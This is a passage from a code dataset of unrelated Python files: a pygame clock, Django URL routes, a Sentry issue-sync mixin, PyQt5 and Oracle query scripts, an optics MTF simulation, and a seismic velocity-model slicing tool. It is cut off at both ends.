main(args)\n","sub_path":"CSC2511_Natural_Language_Processing/a2/bonus3_seq_to_seq.py","file_name":"bonus3_seq_to_seq.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"242267460","text":"import time\nimport pygame as pg\n\npg.init()\n\ngame_display = pg.display.set_mode((450, 130))\npg.display.set_caption(\"CLOCK\")\nnow = time.localtime()\nprint(time.localtime())\nhours = now[3]\nminutes = now[4]\nseconds = now[5]\nprint(str(hours) + \":\" + str(minutes) + \":\" + str(seconds))\ndot = \":\"\nclock_tick = pg.time.Clock()\n# Colors\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\n\n\ndef clock():\n global seconds\n global hours\n global minutes\n timi = str(hours).zfill(2) + dot + str(minutes).zfill(2) + dot + str(seconds).zfill(2)\n seconds += 1\n time.sleep(1)\n if seconds == 60:\n seconds = 00\n minutes += 1\n if minutes == 60:\n minutes = 0\n hours += 1\n if hours == 24:\n hours = 00\n font = pg.font.Font(None, 150)\n timi_render = font.render(timi, 1, white)\n game_display.fill(black)\n game_display.blit(timi_render, (10, 10))\n\n\na = 1\nwhile a == 1:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n a = 2\n clock()\n pg.display.flip()\n clock_tick.tick(60)\n\npg.quit()\nquit()\n","sub_path":"working.py","file_name":"working.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"607320770","text":"import unittest\n\nimport semantic_version\n\nfrom unimport.constants import DESCRIPTION, VERSION\n\n\nclass MetadataTestCase(unittest.TestCase):\n def test_description(self):\n self.assertIsInstance(DESCRIPTION, str)\n self.assertGreater(len(DESCRIPTION), 0, \"Too short description.\")\n\n def test_version(self):\n # It follows strictly the 2.0.0 version of the SemVer scheme.\n # For more information: https://semver.org/spec/v2.0.0.html\n self.assertIsInstance(VERSION, str)\n self.assertTrue(\n semantic_version.validate(VERSION), \"Invalid semantic-version.\"\n )\n","sub_path":"tests/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"475891111","text":"from django.urls import path\n\nfrom .views import (\n SaveListAPIView, \n SaveCountAPIView,\n IsSaved,\n SaveLatestListAPIView,\n SaveRetrieveAPIView,\n SaveCreateAPIView,\n SaveUpdateAPIView,\n SaveDeleteAPIView,\n UnsaveAPIView,\n)\n\nurlpatterns = [\n path('/unsave//',UnsaveAPIView.as_view(),name='unsave-api'),\n path('/saves//',IsSaved.as_view(),name='save-check-api'),\n path('/saves/',SaveListAPIView.as_view(),name='save-list-api'),\n path('create/',SaveCreateAPIView.as_view(),name='save-create-api'),\n\n ###### not used right now ######\n path('/saves/count/',SaveCountAPIView.as_view(),name='save-count-api'),\n path('/saves/latest/',SaveLatestListAPIView.as_view(),name='save-latest-list-api'),\n path('/update//',SaveUpdateAPIView.as_view(),name='save-update-api'),\n path('/delete//',SaveDeleteAPIView.as_view(),name='save-delete-api'),\n]","sub_path":"backend/outreach/save/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"632983043","text":"from __future__ import absolute_import\n\nimport six\n\nfrom sentry.models import Event\nfrom sentry.utils.http import absolute_uri\nfrom sentry.utils.safe import safe_execute\n\n\nclass IssueSyncMixin(object):\n def get_group_title(self, group, event, **kwargs):\n return event.error()\n\n def get_group_body(self, group, event, **kwargs):\n result = []\n for interface in six.itervalues(event.interfaces):\n output = safe_execute(interface.to_string, event, _with_transaction=False)\n if output:\n result.append(output)\n return '\\n\\n'.join(result)\n\n def get_group_description(self, group, event, **kwargs):\n output = [\n absolute_uri(group.get_absolute_url()),\n ]\n body = self.get_group_body(group, event)\n if body:\n output.extend([\n '',\n '```',\n body,\n '```',\n ])\n return '\\n'.join(output)\n\n def get_create_issue_config(self, group, **kwargs):\n \"\"\"\n These fields are used to render a form for the user,\n and are then passed in the format of:\n\n >>>{'title': 'TypeError: Object [object Object] has no method \"updateFrom\"''}\n\n to `create_issue`, which handles creation of the issue\n in JIRA, VSTS, Github, etc\n \"\"\"\n event = group.get_latest_event()\n if event is not None:\n Event.objects.bind_nodes([event], 'data')\n\n return [\n {\n 'name': 'title',\n 'label': 'Title',\n 'default': self.get_group_title(group, event, **kwargs),\n 'type': 'string',\n }, {\n 'name': 'description',\n 'label': 'Description',\n 'default': self.get_group_description(group, event, **kwargs),\n 'type': 'textarea',\n }\n ]\n\n def get_link_issue_config(self, group, **kwargs):\n \"\"\"\n Used by the `GroupIntegrationDetailsEndpoint` to\n create an `ExternalIssue` using title/description\n obtained from calling `get_issue` described below.\n \"\"\"\n return [\n {\n 'name': 'externalIssue',\n 'label': 'Issue',\n 'default': '',\n 'type': 'string',\n }\n ]\n\n def create_issue(self, data, **kwargs):\n \"\"\"\n Create an issue via the provider's API and return the issue key,\n title and description.\n\n Should also handle API client exceptions and reraise as an\n IntegrationError (using the `message_from_error` helper).\n\n >>> def create_issue(self, data, **kwargs):\n >>> resp = self.get_client().create_issue(data)\n >>> return {\n >>> 'key': resp['id'],\n >>> 'title': resp['title'],\n >>> 'description': resp['description'],\n >>> }\n \"\"\"\n raise NotImplementedError\n\n def get_issue(self, issue_id, **kwargs):\n \"\"\"\n Get an issue via the provider's API and return the issue key,\n title and description.\n\n Should also handle API client exceptions and reraise as an\n IntegrationError (using the `message_from_error` helper).\n\n >>> def get_issue(self, data, **kwargs):\n >>> resp = self.get_client().get_issue(issue_id)\n >>> return {\n >>> 'key': resp['id'],\n >>> 'title': resp['title'],\n >>> 'description': resp['description'],\n >>> }\n \"\"\"\n raise NotImplementedError\n\n def sync_assignee_outbound(self, external_issue, user, assign=True, **kwargs):\n \"\"\"\n Propagate a sentry issue's assignee to a linked issue's assignee.\n If assign=True, we're assigning the issue. Otherwise, deassign.\n \"\"\"\n raise NotImplementedError\n\n def sync_status_outbound(self, external_issue, is_resolved, **kwargs):\n \"\"\"\n Propagate a sentry issue's status to a linked issue's status.\n \"\"\"\n raise NotImplementedError\n","sub_path":"src/sentry/integrations/issues.py","file_name":"issues.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"129905682","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget\n\n# 每个PyQt5都必须要有的应用对象,sys.argv是一组命令行参数的列表\napp = QApplication(sys.argv)\n\n# 定义一个窗口对象\nw = QWidget()\n# 定义窗口大小\nw.resize(800, 600)\n# 定义窗口在屏幕中的位置\nw.move(300, 300)\n# 显示窗口\nw.show()\n\n# 主循环从窗口上接收事件,并把事件传入到派发到应用控件里\nsys.exit(app.exec_())","sub_path":"pyqt5/01_main_window.py","file_name":"01_main_window.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"269923653","text":"#!/usr/bin/python\n\n\"\"\"\nOracle libraries in schema\n\"\"\"\n\nimport sys\nfrom lib_properties import pc\nimport lib_oracle\nimport lib_common\n\nfrom sources_types.oracle import schema as oracle_schema\nfrom sources_types.oracle import library as oracle_library\n\ndef Main():\n\tcgiEnv = lib_oracle.OracleEnv()\n\n\toraSchema = cgiEnv.m_entity_id_dict[\"Schema\"]\n\n\tgrph = cgiEnv.GetGraph()\n\n\tsql_query = \"SELECT OBJECT_NAME,STATUS,CREATED FROM ALL_OBJECTS WHERE OBJECT_TYPE = 'LIBRARY' AND OWNER = '\" + oraSchema + \"'\"\n\tsys.stderr.write(\"sql_query=%s\\n\" % sql_query )\n\n\tnode_oraschema = oracle_schema.MakeUri( cgiEnv.m_oraDatabase, oraSchema )\n\n\tresult = lib_oracle.ExecuteQuery( cgiEnv.ConnectStr(), sql_query)\n\n\tfor row in result:\n\t\tlibraryName = str(row[0])\n\t\tnodeLibrary = oracle_library.MakeUri( cgiEnv.m_oraDatabase , oraSchema, libraryName )\n\t\tgrph.add( ( node_oraschema, pc.property_oracle_library, nodeLibrary ) )\n\n\t\tlib_oracle.AddLiteralNotNone(grph,nodeLibrary,\"Status\",row[1])\n\t\tlib_oracle.AddLiteralNotNone(grph,nodeLibrary,\"Creation\",row[2])\n\n\tcgiEnv.OutCgiRdf(\"LAYOUT_RECT\",[pc.property_oracle_library])\n\nif __name__ == '__main__':\n\tMain()\n","sub_path":"survol/sources_types/oracle/schema/oracle_schema_libraries.py","file_name":"oracle_schema_libraries.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"276960263","text":"import jieba\nimport jieba.posseg as pseg\nimport hanlp\n\ndef get_per_list(text):\n recognizer = hanlp.load(hanlp.pretrained.ner.MSRA_NER_BERT_BASE_ZH)\n recognizer_results = recognizer.predict(list(text))\n name_list = []\n for resultParam in recognizer_results:\n if resultParam[1] == 'NR':\n name_list.append(resultParam[0])\n return name_list\n\ndef get_loc_list(text):\n _list = []\n word_list = jieba.lcut(text)\n for word in word_list:\n if len(word)==1: # 不加判断会爆\n continue\n words = pseg.cut(word, use_paddle=True) # paddle模式\n word, flag = list(words)[0]\n if flag=='LOC' or flag == 'ns': # 这里写成LOC是地名\n _list.append(word)\n _list = list(set(_list))\n return _list\n","sub_path":"python/nlp/nbtest/utils/NlpUtils.py","file_name":"NlpUtils.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"78931570","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 7 12:47:00 2021\n\n@author: Sean\n\"\"\"\nfrom math import ceil\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom prysm.propagation import psf_sample_to_pupil_sample, Wavefront\nfrom prysm.coordinates import make_xy_grid, cart_to_polar\nfrom prysm.geometry import circle\nfrom prysm.otf import mtf_from_psf\nfrom prysm.objects import slantededge, siemensstar\nfrom prysm.convolution import conv\nfrom prysm.polynomials import zernike_nm\nfrom prysm.detector import bindown\n\noutput_res = 100\nwlen = 0.550\npixel_pitch = 4.5\nf = 50\nfno = 4\nlens_D = f/fno\nlens_R = lens_D/2\n\n# The above specification determine a Q of:\nQ = (wlen)*(fno)/pixel_pitch\n\n# Need Q_forward >= 2 for forward model, so Q_forward = Q*(oversampling) = 2\noversampling = ceil(2/Q)\nQ_forward = round(Q*oversampling, 1)\n\n# Intermediate higher res gives psize = pixel_pitch/oversampling\npsize = pixel_pitch/oversampling\n\n# PSF_domain_res will be output_res*oversampling\n# Pupil domain samples will be (PSF_domain_res)/Q_forward\nsamples = ceil(output_res*oversampling/Q_forward)\n\n# Find pupil dx from wanted psize\npup_dx = psf_sample_to_pupil_sample(psize, samples, wlen, f)\n\n# Construct pupil grid, convert to polar, construct normalized r for phase\nxi, eta = make_xy_grid(samples, dx=pup_dx)\nr, theta = cart_to_polar(xi, eta)\nnorm_r = r/lens_R\n\n# Construct amplitude function of pupil function\namp = circle(lens_R, r)\namp = amp / amp.sum()\n\n# Construct phase mode\naber = zernike_nm(4, 0, norm_r, theta) # spherical aberration\n# Scale phase mode to desired opd\nphase = aber * wlen/16 * 1e3\n\n# Construct pupil function from amp and phase functions, propagate to PSF plane, take square modulus.\nP = Wavefront.from_amp_and_phase(amp, phase, wlen, pup_dx)\ncoherent_PSF = P.focus(f, Q=Q_forward)\nPSF = coherent_PSF.intensity\n\n# Plot PSF\nPSF_radius = 1.22*wlen*fno\nPSF.plot2d(xlim=5*PSF_radius, cmap='gray', clim=(0, .1))\n\n# Hist of PSF\n# hist = plt.hist(np.histogram(PSF.data))\n\n# Construct MTF from PSF\nMTF = mtf_from_psf(PSF, PSF.dx)\n\nfx, _ = MTF.slices().x\nfig, ax = MTF.slices().plot(['x', 'y', 'azavg'], xlim=(0,50), ylim=(0.7,1))\n# ax.plot(fx, ls=':', c='k', alpha=0.75, zorder=1)\n# ax.axvline(1000/(2*pixel_pitch))\n# ax.axvline(50)\n# ax.axhline(0.8)\nax.set(xlabel='Spatial frequency, cy/mm', ylabel='MTF')\n\n# Constuct sample grid for edge/star test patterns\nx,y = make_xy_grid(shape=PSF.data.shape[0], dx=PSF.dx)\nrho, t = cart_to_polar(x, y)\n\n# Construct slanted edge and Siemen's star test patterns\n# Edge simulation should be done at ~100 output res\n# Star simulation should be done at ~512 output res\nedge = slantededge(x, y)\n# star = siemensstar(rho, t, 40, oradius=x.max()*0.8)\n\n# Blur images by convolving with PSF\nconvedge = conv(edge, PSF.data)\n# convstar = conv(star, PSF.data)\n\n# Resample to output resolution\nedge_image = bindown(convedge, oversampling)\n# star_image = bindown(convstar, oversampling)\n\n# Plot edge test pattern and blurred image\nfig, axes = plt.subplots(ncols=2, figsize=(10,10))\naxes[0].imshow(edge, cmap='gray')\naxes[1].imshow(edge_image, cmap='gray')\n\n# Plot star test pattern and blurred image\n# fig, axes = plt.subplots(ncols=2, figsize=(10,10))\n# axes[0].imshow(star, cmap='gray')\n# axes[1].imshow(star_image, cmap='gray')\n","sub_path":"Image Simulation.py","file_name":"Image Simulation.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"426327140","text":"#!/usr/bin/env python\n#\n# ----------------------------------------------------------------------\n#\n# Brad T. Aagaard\n# U.S. Geological Survey\n#\n# ----------------------------------------------------------------------\n#\n\nimport os\nimport numpy\nfrom importlib import import_module\nimport logging\nimport configparser\n\nimport matplotlib.pyplot as pyplot\nimport matplotlib.colors as colors\nimport matplotlib.patches as patches\nimport matplotlib.ticker as ticker\nfrom osgeo import osr\nfrom cartopy import crs\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\nfrom cartopy_extra_tiles import cached_tiler\nfrom cartopy_extra_tiles import scale_bar\nimport matplotlib_extras\n\nNO_DATA_VALUE = -999.0\n\n# ----------------------------------------------------------------------\ndef _config_get_list(list_string):\n \"\"\"Convert list as string to list.\n\n :type list_string: list\n :param list_string: List as string.\n :returns: List of strings.\n \"\"\"\n l = [f.strip() for f in list_string[1:-1].split(\",\")]\n return l\n\n\n# ----------------------------------------------------------------------\nclass SlicesApp(object):\n \"\"\"Extract slices from USGS CenCalVM 3-D seismic velocity model.\n \"\"\"\n \n def __init__(self):\n \"\"\"Constructor.\n \"\"\"\n self.config = None\n\n self.velCmap = \"plasma_r\" #\"viridis\" # plasma\n self.velNorm = colors.LogNorm(vmin=200.0, vmax=8000.0)\n self.velContours = [250.0, 500.0, 1000.0, 2000.0, 4000.0, 8000.0]\n return\n\n def main(self):\n \"\"\"Main entry point\n \"\"\"\n # Initialization\n args = self._parseCommandLine()\n logLevel = logging.DEBUG if args.debug else logging.INFO\n logging.basicConfig(level=logLevel, filename=\"slicer.log\")\n if args.show_progress:\n self.showProgress = True\n self.initialize(args.config.split(\",\"))\n\n if args.show_parameters:\n self.show_parameters()\n\n if args.query:\n self.query()\n\n if args.plot_hslices:\n self.plot_hslices()\n\n if args.plot_vslices:\n self.plot_vslices()\n return\n\n def query(self):\n \"\"\"Query seismic velocity model.\n \"\"\"\n import subprocess\n import io\n\n config = os.path.expanduser(self.config[\"ucvm\"][\"config\"])\n model = self.config[\"domain\"][\"model\"]\n env = self.config[\"ucvm.environment\"]\n \n slices = _config_get_list(self.config[\"horiz_slices\"][\"slices\"])\n for label in slices:\n z_flag = \"ge\" if self.config[label][\"z_coordinate\"] == \"elevation\" else \"gd\"\n points = self.hslice_points(label)\n\n points_string = io.BytesIO()\n numpy.savetxt(points_string, points, fmt=\"%12.4f\")\n \n cmd = [\"ucvm_query\", \"-f\", config, \"-m\", model, \"-c\", z_flag]\n result = subprocess.run(cmd, input=points_string.getvalue(), env=env, stdout=subprocess.PIPE)\n\n data = numpy.loadtxt(result.stdout.decode().split(\"\\n\"), usecols=(14,15,16))\n self.save_slice(\"horiz_slice\", label, points, data)\n\n # Vertical slices\n #slices = _config_get_list(self.config[\"vert_slices\"][\"slices\"])\n #for label in slices:\n # (points, distH, elev) = self.vslice_points(label)\n # npoints = points.shape[0]\n # # :TODO: ADD STUFF HERE\n # self.save_slice(\"vert_slice\", label, points, data)\n return\n\n def plot_hslices(self):\n pyplot.style.use([\"color-lightbg\", \"size-presentation\"])\n slices = _config_get_list(self.config[\"horiz_slices\"][\"slices\"])\n for label in slices:\n self.plot_hslice(label)\n return\n \n def plot_vslices(self):\n pyplot.style.use([\"color-lightbg\", \"size-presentation\"])\n slices = _config_get_list(self.config[\"vert_slices\"][\"slices\"])\n for label in slices:\n self.plot_vslice(label)\n return\n \n def hslice_points(self, label):\n \"\"\"Generate points for horizontal slice.\n \"\"\"\n lonMin = float(self.config[\"horiz_slices\"][\"longitude_min\"])\n lonMax = float(self.config[\"horiz_slices\"][\"longitude_max\"])\n \n latMin = float(self.config[\"horiz_slices\"][\"latitude_min\"])\n latMax = float(self.config[\"horiz_slices\"][\"latitude_max\"])\n\n res = float(self.config[\"horiz_slices\"][\"resolution_deg\"])\n \n z0 = float(self.config[label][\"z_m\"])\n\n lon1 = numpy.arange(lonMin, lonMax+0.1*res, res, dtype=numpy.float64)\n lat1 = numpy.arange(latMin, latMax+0.1*res, res, dtype=numpy.float64)\n\n logger = logging.getLogger(__name__)\n logger.info(\"Slice {}: numLon={}, numLat={}.\".format(label, lon1.shape[-1], lat1.shape[-1]))\n \n lon, lat = numpy.meshgrid(lon1, lat1)\n z = z0 * numpy.ones(lon.shape, dtype=numpy.float64)\n points = numpy.vstack((lon.ravel(), lat.ravel(), z.ravel(),)).transpose()\n return points\n\n def vslice_points(self, label):\n \"\"\"Generate points for vertical slice.\n \"\"\"\n lonStart = float(self.config[label][\"longitude_start\"])\n lonEnd = float(self.config[label][\"longitude_end\"])\n latStart = float(self.config[label][\"latitude_start\"])\n latEnd = float(self.config[label][\"latitude_end\"])\n resH = float(self.config[\"vert_slices\"][\"resolution_horiz_m\"])\n\n elevMax = 1000.0 * float(self.config[\"vert_slices\"][\"elevation_max_km\"])\n elevMin = 1000.0 * float(self.config[\"vert_slices\"][\"elevation_min_km\"])\n resV = float(self.config[\"vert_slices\"][\"resolution_vert_m\"])\n\n dist = self.distance(lonStart, latStart, numpy.array([lonEnd]), numpy.array([latEnd]))\n nptsH = 1 + int(0.5 + dist / resH)\n nptsV = 1 + int(0.5 + (elevMax - elevMin) / resV)\n lon1 = numpy.linspace(lonStart, lonEnd, nptsH)\n lat1 = numpy.linspace(latStart, latEnd, nptsH)\n elev = numpy.linspace(elevMax, elevMin, nptsV)\n distH = self.distance(lonStart, latStart, lon1, lat1)\n\n points = numpy.zeros((nptsH*nptsV, 3), dtype=numpy.float64)\n points[:,0] = numpy.repeat(lon1, nptsV)\n points[:,1] = numpy.repeat(lat1, nptsV)\n points[:,2] = numpy.array(elev.tolist()*nptsH)\n return (points, distH, elev)\n\n def distance(self, refLon, refLat, ptsLon, ptsLat):\n \"\"\"Get great circle distance in meters from reference point to points.\n\n Source: https://en.wikipedia.org/wiki/Great-circle_distance\n\n :type refLon: float\n :param refLon: Longitude of reference point in degrees.\n\n :type refLat: float\n :param refLat: Latitude of reference point in degrees.\n\n :type ptsLon: Numpy array\n :param ptsLon: Longitude of points in degrees.\n\n :type ptsLat: Numpy array\n :param ptsLat: Latitude of points in degrees.\n \"\"\"\n EARTH_MEAN_RADIUS_M = 6371.0e+3\n DEG_TO_RAD = numpy.pi / 180.0\n\n refLonR = refLon * DEG_TO_RAD\n refLatR = refLat * DEG_TO_RAD\n ptsLonR = ptsLon * DEG_TO_RAD\n ptsLatR = ptsLat * DEG_TO_RAD\n\n p = numpy.sin(0.5*(ptsLatR-refLatR))**2 \\\n + numpy.cos(refLatR)*numpy.cos(ptsLatR)*numpy.sin(0.5*(ptsLonR-refLonR))**2\n return EARTH_MEAN_RADIUS_M * 2.0*numpy.arcsin(p**0.5)\n\n def save_slice(self, sliceType, label, points, data):\n \"\"\"Save slice to file.\n \"\"\"\n header = [\"longitude(deg),latitude(deg),elevation(m),Vp(m/s),Vs(m/s),Density(kg/m**3)\"]\n\n domain = self.config[\"domain\"][\"label\"]\n filename = \"{}-{}-{}.txt.gz\".format(domain, sliceType, label)\n values = numpy.vstack((points[:,0], points[:,1], points[:,2], data[:,0], data[:,1], data[:,2])).transpose()\n numpy.savetxt(os.path.join(\"data\", filename), values, fmt=\"%.4f, %.4f, %.1f, %.1f, %.1f, %.1f\", header=\"\\n\".join(header))\n return\n\n def create_basemap(self, dataExtent):\n tilerPath = self.config[\"maps\"][\"tiler\"].split(\".\")\n tilerObj = getattr(import_module(\".\".join(tilerPath[:-1])), tilerPath[-1])\n tilerStyle = self.config[\"maps\"][\"tiler_style\"]\n tilerZoom = int(self.config[\"maps\"][\"zoom_level\"])\n tilesDir = self.config[\"maps\"][\"tiler_cache_dir\"]\n tiler = cached_tiler.CachedTiler(tilerObj(desired_tile_form=\"L\", style=tilerStyle), cache_dir=tilesDir)\n \n figWidthIn = float(self.config[\"maps\"][\"width_in\"])\n figHeightIn = float(self.config[\"maps\"][\"height_in\"])\n figure = pyplot.figure(figsize=(figWidthIn, figHeightIn), dpi=300)\n\n rectFactory = matplotlib_extras.axes.RectFactory(figure, margins=((0.45, 0, 0.05), (0.30, 0, 0.25)))\n ax = figure.add_axes(rectFactory.rect(), projection=tiler.crs)\n ax.set_extent(dataExtent)\n ax.add_image(tiler, tilerZoom, zorder=0, cmap=\"gray\")\n\n tickSpacingDeg = float(self.config[\"maps\"][\"tick_spacing_deg\"])\n gridlines = ax.gridlines(crs=crs.PlateCarree(), draw_labels=True, linewidth=0.5, alpha=0.2)\n gridlines.xlabels_top = False\n gridlines.xlabels_bottom = True\n gridlines.ylabels_left = True\n gridlines.ylabels_right = False\n gridlines.xformatter = LONGITUDE_FORMATTER\n gridlines.yformatter = LATITUDE_FORMATTER\n gridlines.xlocator = ticker.MultipleLocator(tickSpacingDeg)\n gridlines.ylocator = ticker.MultipleLocator(tickSpacingDeg)\n\n scale_bar.scale_bar(ax, (0.04, 0.93), int(self.config[\"maps\"][\"scale_bar_km\"]), zorder=7, linewidth=2)\n return figure\n \n def plot_hslice(self, label):\n COLORBAR_AXES = [0.15, 0.08, 0.02, 0.33]\n \n res = float(self.config[\"horiz_slices\"][\"resolution_deg\"])\n\n domain = self.config[\"domain\"][\"label\"]\n filename = \"{}-{}-{}.txt.gz\".format(domain, \"horiz_slice\", label)\n data = numpy.loadtxt(os.path.join(\"data\", filename), delimiter=\",\")\n\n lonMin, lonMax = numpy.min(data[:,0]), numpy.max(data[:,0])\n latMin, latMax = numpy.min(data[:,1]), numpy.max(data[:,1])\n numLon = 1 + int(0.5 + (lonMax - lonMin) / res)\n numLat = 1 + int(0.5 + (latMax - latMin) / res)\n gridShape = (numLat, numLon)\n\n lon = data[:,0].reshape(gridShape)\n lat = data[:,1].reshape(gridShape)\n elev = data[:,2].reshape(gridShape)\n vp = numpy.ma.masked_values(data[:,3].reshape(gridShape), NO_DATA_VALUE)\n vs = numpy.ma.masked_values(data[:,4].reshape(gridShape), NO_DATA_VALUE)\n density = numpy.ma.masked_values(data[:,5].reshape(gridShape), NO_DATA_VALUE)\n \n dataExtent = [lonMin, lonMax, latMin, latMax]\n dataCRS = crs.PlateCarree()\n\n # Vs\n figure = self.create_basemap(dataExtent)\n ax = figure.gca()\n im = ax.imshow(vs, norm=self.velNorm, extent=dataExtent, transform=dataCRS, origin=\"lower\", cmap=self.velCmap, alpha=0.5, zorder=2)\n \n ax.set_title(\"Vs\")\n cbax = figure.add_axes(COLORBAR_AXES)\n formatter = ticker.FormatStrFormatter(\"%.0f\")\n colorbar = pyplot.colorbar(im, cax=cbax, ticks=self.velContours, format=formatter)\n colorbar.set_label(\"Vs (m/s)\")\n\n filename = \"{}-horiz_slice-{}_map_vs.jpg\".format(domain, label)\n figure.savefig(os.path.join(\"plots\", filename), pad_inches=0.02)\n pyplot.close(figure)\n \n # Vp\n figure = self.create_basemap(dataExtent)\n ax = figure.gca()\n im = ax.imshow(vp, norm=self.velNorm, extent=dataExtent, transform=dataCRS, origin=\"lower\", cmap=self.velCmap, alpha=0.5, zorder=2)\n\n ax.set_title(\"Vp\")\n cbax = figure.add_axes(COLORBAR_AXES)\n formatter = ticker.FormatStrFormatter(\"%.0f\")\n colorbar = pyplot.colorbar(im, cax=cbax, ticks=self.velContours, format=formatter)\n colorbar.set_label(\"Vp (m/s)\")\n\n filename = \"{}-horiz_slice-{}_map_vp.jpg\".format(domain, label)\n figure.savefig(os.path.join(\"plots\", filename), pad_inches=0.02)\n pyplot.close(figure)\n return\n\n def plot_vslice(self, label):\n (points, distH, elev) = self.vslice_points(label)\n\n domain = self.config[\"domain\"][\"label\"]\n filename = \"{}-{}-{}.txt.gz\".format(domain, \"vert_slice\", label)\n data = numpy.loadtxt(os.path.join(\"data\", filename), delimiter=\",\")\n\n numH = distH.shape[-1]\n numV = elev.shape[-1]\n gridShape = (numH, numV)\n\n vp = numpy.ma.masked_values(data[:,3].reshape(gridShape), NO_DATA_VALUE).transpose()\n vs = numpy.ma.masked_values(data[:,4].reshape(gridShape), NO_DATA_VALUE).transpose()\n density = numpy.ma.masked_values(data[:,5].reshape(gridShape), NO_DATA_VALUE)\n \n distH *= 1.0e-3\n elev *= 1.0e-3\n dataExtent = [numpy.min(distH), numpy.max(distH), numpy.min(elev), numpy.max(elev)]\n \n # Vs\n figWidthIn = float(self.config[\"profiles\"][\"width_in\"])\n figHeightIn = float(self.config[\"profiles\"][\"height_in\"])\n figure = pyplot.figure(figsize=(figWidthIn, figHeightIn), dpi=150)\n\n figure.subplots_adjust(bottom=0.24, top=0.9, left=0.11, right=0.85)\n ax = pyplot.axes()\n ax.set_aspect(\"equal\")\n im = ax.imshow(vs, norm=self.velNorm, extent=dataExtent, origin=\"upper\", cmap=self.velCmap, zorder=2)\n \n ax.set_title(\"Vs\")\n ax.set_xlabel(\"Distance (km)\")\n ax.set_ylabel(\"Elevation (km)\")\n ax.tick_params(\"both\", direction=\"out\")\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"right\"].set_visible(False)\n ax.xaxis.set_ticks_position(\"bottom\")\n ax.yaxis.set_ticks_position(\"left\")\n ax.xaxis.set_major_locator(ticker.MultipleLocator(20.0))\n ax.xaxis.set_minor_locator(ticker.MultipleLocator(5.0))\n ax.yaxis.set_major_locator(ticker.MultipleLocator(10.0))\n ax.yaxis.set_minor_locator(ticker.MultipleLocator(5.0))\n \n cbax = figure.add_axes([0.87, 0.2, 0.02, 0.7])\n formatter = ticker.FormatStrFormatter(\"%.0f\")\n colorbar = pyplot.colorbar(im, cax=cbax, ticks=self.velContours, format=formatter)\n colorbar.set_label(\"Vs (m/s)\")\n\n filename = \"{}-vert_slice-{}_vs.png\".format(domain, label)\n figure.savefig(os.path.join(\"plots\", filename), pad_inches=0.02)\n pyplot.close(figure)\n\n # Vp\n figWidthIn = float(self.config[\"profiles\"][\"width_in\"])\n figHeightIn = float(self.config[\"profiles\"][\"height_in\"])\n figure = pyplot.figure(figsize=(figWidthIn, figHeightIn), dpi=150)\n\n figure.subplots_adjust(bottom=0.24, top=0.9, left=0.11, right=0.85)\n ax = pyplot.axes()\n ax.set_aspect(\"equal\")\n im = ax.imshow(vp, norm=self.velNorm, extent=dataExtent, origin=\"upper\", cmap=self.velCmap, zorder=2)\n \n ax.set_title(\"Vp\")\n ax.set_xlabel(\"Distance (km)\")\n ax.set_ylabel(\"Elevation (km)\")\n ax.tick_params(\"both\", direction=\"out\")\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"right\"].set_visible(False)\n ax.xaxis.set_ticks_position(\"bottom\")\n ax.yaxis.set_ticks_position(\"left\")\n ax.xaxis.set_major_locator(ticker.MultipleLocator(20.0))\n ax.xaxis.set_minor_locator(ticker.MultipleLocator(5.0))\n ax.yaxis.set_major_locator(ticker.MultipleLocator(10.0))\n ax.yaxis.set_minor_locator(ticker.MultipleLocator(5.0))\n \n cbax = figure.add_axes([0.87, 0.2, 0.02, 0.7])\n formatter = ticker.FormatStrFormatter(\"%.0f\")\n colorbar = pyplot.colorbar(im, cax=cbax, ticks=self.velContours, format=formatter)\n colorbar.set_label(\"Vp (m/s)\")\n\n filename = \"{}-vert_slice-{}_vp.png\".format(domain, label)\n figure.savefig(os.path.join(\"plots\", filename), pad_inches=0.02)\n pyplot.close(figure) \n return\n \n def initialize(self, filenames, keep_case=True, verbose=False):\n \"\"\"Get configuration from .cfg files.\n \n Args:\n filenames (list)\n List of .cfg files to read.\n keep_case (bool)\n If True, maintain case in section headings, otherwise convert to lowercase.\n verbose (bool)\n If True, print out progress.\n\n Returns:\n Dictionary with configuration.\n \"\"\"\n config = configparser.ConfigParser()\n if keep_case:\n config.optionxform = str\n for filename in filenames:\n if not os.path.isfile(filename):\n raise IOError(\"Could not find configuration file '{}'.\".format(filename))\n if verbose:\n print(\"Fetching parameters from {}...\".format(filename))\n config.read(filename)\n self.config = {s: dict(config.items(s)) for s in config.sections()}\n \n def show_parameters(self):\n \"\"\"Write parameters to stdout.\n \"\"\"\n import sys\n parser = configparser.ConfigParser()\n parser.read_dict(self.config)\n parser.write(sys.stdout)\n\n def _parseCommandLine(self):\n \"\"\"Parse command line arguments.\n \"\"\"\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", action=\"store\", dest=\"config\", required=True)\n parser.add_argument(\"--show-parameters\", 